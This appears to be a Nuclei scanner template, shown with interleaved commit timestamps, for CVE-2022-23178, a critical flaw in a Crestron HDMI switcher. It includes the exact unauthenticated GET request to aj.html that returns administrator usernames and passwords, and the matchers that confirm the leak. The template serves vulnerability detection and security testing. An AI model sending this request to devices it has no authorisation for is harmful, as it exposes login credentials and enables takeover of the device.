2022-01-23 11:28:25 +00:00
id : CVE-2022-23178
info :
name : Crestron Device - Credentials Disclosure
author : gy741
severity : critical
2022-05-17 09:18:12 +00:00
description : An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields.
2022-01-23 11:28:25 +00:00
reference :
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-009/-credential-disclosure-in-web-interface-of-crestron-device
2022-01-24 07:07:55 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-23178
- https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E
2022-05-17 09:18:12 +00:00
- https://www.redteam-pentesting.de/advisories/rt-sa-2021-009
2022-01-25 11:06:39 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2022-01-25 11:06:39 +00:00
cve-id : CVE-2022-23178
cwe-id : CWE-287
2023-04-12 10:55:48 +00:00
epss-score : 0.0307
2022-04-22 10:38:41 +00:00
tags : cve,cve2022,crestron,disclosure
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2022-01-23 11:28:25 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-01-23 11:28:25 +00:00
- method : GET
path :
- "{{BaseURL}}/aj.html?a=devi"
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
2022-01-24 07:07:55 +00:00
part : body
2022-01-23 11:28:25 +00:00
words :
2022-01-24 07:07:55 +00:00
- '"uname":'
- '"upassword":'
2022-01-23 11:28:25 +00:00
condition : and
2022-02-28 21:29:50 +00:00
# Enhanced by mp on 2022/02/28